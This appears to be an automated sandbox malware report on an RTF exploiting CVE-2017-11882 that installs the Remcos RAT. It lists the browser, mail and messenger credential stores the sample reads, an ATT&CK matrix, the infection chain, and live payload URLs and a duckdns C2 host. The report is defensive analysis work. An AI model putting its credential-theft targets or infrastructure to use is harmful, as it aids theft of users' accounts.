                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.dbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.dbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.dbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword12_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword12_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword12_2_00402DB3
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3184, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCGJump to behavior
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.powershell.exe.43c2080.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000539000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.875009514.0000000000505000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.874879504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.365223710.000000000409D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4008, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe8_2_0040569A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting
                  Valid Accounts11
                  Native API
                  111
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  2
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services11
                  Archive Collected Data
                  13
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  Bypass User Account Control
                  3
                  Obfuscated Files or Information
                  111
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol1
                  Data from Local System
                  21
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts123
                  Command and Scripting Interpreter
                  1
                  Windows Service
                  1
                  Access Token Manipulation
                  1
                  Install Root Certificate
                  2
                  Credentials in Registry
                  1
                  System Service Discovery
                  SMB/Windows Admin Shares2
                  Email Collection
                  1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution
                  Login Hook1
                  Windows Service
                  1
                  DLL Side-Loading
                  3
                  Credentials In Files
                  4
                  File and Directory Discovery
                  Distributed Component Object Model111
                  Input Capture
                  1
                  Remote Access Software
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell
                  Network Logon Script422
                  Process Injection
                  1
                  Bypass User Account Control
                  LSA Secrets38
                  System Information Discovery
                  SSH3
                  Clipboard Data
                  2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading
                  Cached Domain Credentials3
                  Security Software Discovery
                  VNCGUI Input Capture213
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Modify Registry
                  DCSync21
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal Capture1
                  Proxy
                  Exfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                  Virtualization/Sandbox Evasion
                  Proc Filesystem4
                  Process Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadow1
                  Application Window Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron422
                  Process Injection
                  Network Sniffing1
                  System Owner/User Discovery
                  Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery
                  Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1505518 Sample: SecuriteInfo.com.Exploit.CV... Startdate: 06/09/2024 Architecture: WINDOWS Score: 100 55 Multi AV Scanner detection for domain / URL 2->55 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 22 other signatures 2->61 11 WINWORD.EXE 291 13 2->11         started        process3 process4 13 EQNEDT32.EXE 12 11->13         started        18 EQNEDT32.EXE 11->18         started        dnsIp5 47 85.239.241.184, 49161, 49163, 80 CASABLANCA-ASInternetCollocationProviderCZ Czech Republic 13->47 43 C:\Users\...\escreenthepicturewithbutters.vBS, Unicode 13->43 dropped 91 Office equation editor establishes network connection 13->91 93 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 13->93 20 wscript.exe 1 13->20         started        file6 signatures7 process8 signatures9 71 Suspicious powershell command line found 20->71 73 Wscript starts Powershell (via cmd or directly) 20->73 75 Very long command line found 20->75 77 3 other signatures 20->77 23 powershell.exe 4 20->23         started        process10 signatures11 79 Suspicious powershell command line found 23->79 81 Suspicious execution chain found 23->81 26 powershell.exe 12 5 23->26         started        process12 dnsIp13 45 archive.org 207.241.224.2, 443, 49162 INTERNET-ARCHIVEUS United States 26->45 83 Installs new ROOT certificates 26->83 85 Found Tor onion address 26->85 87 Writes to foreign memory regions 26->87 89 Injects a PE file into a foreign processes 26->89 30 RegAsm.exe 3 10 26->30         started        signatures14 process15 dnsIp16 49 dremom2.duckdns.org 30->49 51 dremom2.duckdns.org 45.89.247.65, 2201, 49164, 49165 CMCSUS United Kingdom 30->51 53 geoplugin.net 178.237.33.50, 49166, 80 ATOM86-ASATOM86NL Netherlands 30->53 95 Contains functionality to bypass UAC (CMSTPLUA) 30->95 97 Detected Remcos RAT 30->97 99 Tries to steal Mail credentials (via file registry) 30->99 103 6 other signatures 30->103 34 RegAsm.exe 1 30->34         started        37 RegAsm.exe 1 30->37         started        39 RegAsm.exe 11 30->39         started        41 RegAsm.exe 30->41         started        signatures17 101 Uses dynamic DNS services 49->101 process18 signatures19 63 Tries to steal Instant Messenger accounts or passwords 34->63 65 Tries to steal Mail credentials (via file / registry access) 34->65 67 Searches for Windows Mail specific files 34->67 69 Tries to harvest and steal browser information (history, passwords, etc) 37->69

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf53%VirustotalBrowse
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf47%ReversingLabsDocument-RTF.Exploit.CVE-2017-11882
                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.12187.29198.rtf100%AviraHEUR/Rtf.Malformed
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  dremom2.duckdns.org1%VirustotalBrowse
                  archive.org0%VirustotalBrowse
                  geoplugin.net1%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://b.scorecardresearch.com/beacon.js0%URL Reputationsafe
                  http://acdn.adnxs.com/ast/ast.js0%URL Reputationsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%URL Reputationsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%URL Reputationsafe
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%URL Reputationsafe
                  https://support.google.com/chrome/?p=plugin_flash0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%URL Reputationsafe
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%URL Reputationsafe
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%URL Reputationsafe
                  http://cache.btrll.com/default/Pix-1x1.gif0%URL Reputationsafe
                  http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%URL Reputationsafe
                  http://o.aolcdn.com/ads/adswrappermsni.js0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%URL Reputationsafe
                  http://static.chartbeat.com/js/chartbeat.js0%URL Reputationsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%URL Reputationsafe
                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%URL Reputationsafe
                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%URL Reputationsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%URL Reputationsafe
                  https://www.ccleaner.com/go/app_cc_pro_trialkey0%URL Reputationsafe
                  https://contextual.media.net/8/nrrV73987.js0%URL Reputationsafe
                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%URL Reputationsafe
                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%URL Reputationsafe
                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                  http://www.imvu.comr0%Avira URL Cloudsafe
                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%URL Reputationsafe
                  http://cdn.at.atwola.com/_media/uac/msn.html0%URL Reputationsafe
                  http://go.microsoft.c0%URL Reputationsafe
                  http://ocsp.entrust.net030%Avira URL Cloudsafe
                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%URL Reputationsafe
                  https://policies.yahoo.com/w3c/p3p.xml0%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  https://contoso.com/License0%Avira URL Cloudsafe
                  http://www.imvu.com/HK0%Avira URL Cloudsafe
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF0%Avira URL Cloudsafe
                  http://www.diginotar.nl/cps/pkioverheid00%Avira URL Cloudsafe
                  https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%Avira URL Cloudsafe
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF2%VirustotalBrowse
                  https://deff.nelreports.net/api/report?cat=msn0%VirustotalBrowse
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  https://contoso.com/License0%VirustotalBrowse
                  http://85.239.241.184/35/WERFFG.txt0%Avira URL Cloudsafe
                  http://www.diginotar.nl/cps/pkioverheid00%VirustotalBrowse
                  https://archive.org/download/new_image_vbs/new_image_vbs.jpg0%Avira URL Cloudsafe
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%VirustotalBrowse
                  https://www.google.com0%Avira URL Cloudsafe
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIF)0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gp/C0%Avira URL Cloudsafe
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFce0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
                  http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                  https://contoso.com/0%Avira URL Cloudsafe
                  http://85.239.241.184/35/WERFFG.txt2%VirustotalBrowse
                  http://geoplugin.net/json.gp/C0%VirustotalBrowse
                  https://www.google.com0%VirustotalBrowse
                  https://nuget.org/nuget.exe0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                  http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                  dremom2.duckdns.org100%Avira URL Cloudmalware
                  https://archive.org/download/new_image_vbs/new_image_vbs.jpg0%VirustotalBrowse
                  https://login.yahoo.com/config/login0%Avira URL Cloudsafe
                  https://nuget.org/nuget.exe0%VirustotalBrowse
                  http://www.nirsoft.net00%Avira URL Cloudsafe
                  http://www.msn.com/?ocid=iehp0%VirustotalBrowse
                  http://www.msn.com/de-de/?ocid=iehp0%VirustotalBrowse
                  http://www.nirsoft.net/0%Avira URL Cloudsafe
                  https://contoso.com/0%VirustotalBrowse
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%VirustotalBrowse
                  http://ocsp.entrust.net0D0%Avira URL Cloudsafe
                  http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                  http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
                  http://crl.entrust.net/server1.crl00%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%VirustotalBrowse
                  https://archive.org/download/new_image_vbs/new_imaLR0%Avira URL Cloudsafe
                  http://www.imvu.com0%Avira URL Cloudsafe
                  http://crl.entrust.net/server1.crl00%VirustotalBrowse
                  http://nuget.org/NuGet.exe0%VirustotalBrowse
                  https://contoso.com/Icon0%Avira URL Cloudsafe
                  https://contextual.media.net/0%Avira URL Cloudsafe
                  https://archive.org0%Avira URL Cloudsafe
                  http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%VirustotalBrowse
                  dremom2.duckdns.org1%VirustotalBrowse
                  https://login.yahoo.com/config/login0%VirustotalBrowse
                  http://www.msn.com/0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gp0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  https://contoso.com/Icon0%VirustotalBrowse
                  https://contextual.media.net/0%VirustotalBrowse
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFj0%Avira URL Cloudsafe
                  https://archive6zg5vrdwm4ljllgxleekeoj43lqayscd4d4kmhnyblq4h3ead.onion/download/new_image_vbs/new_im0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
                  http://geoplugin.net/json.gp8%VirustotalBrowse
                  http://85.239.241.1840%Avira URL Cloudsafe
                  http://www.msn.com/0%VirustotalBrowse
                  https://archive.org0%VirustotalBrowse
                  https://archive.org/download/new_image_vbs/new_imaLR0%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  dremom2.duckdns.org
                  45.89.247.65
                  truetrueunknown
                  archive.org
                  207.241.224.2
                  truetrueunknown
                  geoplugin.net
                  178.237.33.50
                  truefalseunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://85.239.241.184/35/wescreenthepicturewithbuttersmoothpy.tIFtrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://85.239.241.184/35/WERFFG.txttrue
                  • 2%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://archive.org/download/new_image_vbs/new_image_vbs.jpgtrue
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  dremom2.duckdns.orgtrue
                  • 1%, Virustotal, Browse
                  • Avira URL Cloud: malware
                  unknown
                  http://geoplugin.net/json.gpfalse
                  • 8%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://b.scorecardresearch.com/beacon.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://acdn.adnxs.com/ast/ast.jsbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  http://www.imvu.comrRegAsm.exe, 0000000E.00000002.378253286.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.imvu.com/HKRegAsm.exe, 0000000E.00000002.378106098.000000000034C000.00000004.00000010.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://ocsp.entrust.net03powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  unknown
                  https://contoso.com/Licensepowershell.exe, 00000007.00000002.365223710.0000000003489000.00000004.00000800.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000B.00000002.381064244.00000000025C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhv5928.tmp.11.drfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.366941272.0000000004F54000.00000004.00000020.00020000.00000000.sdmpfalse
                  • 0%, Virustotal, Browse
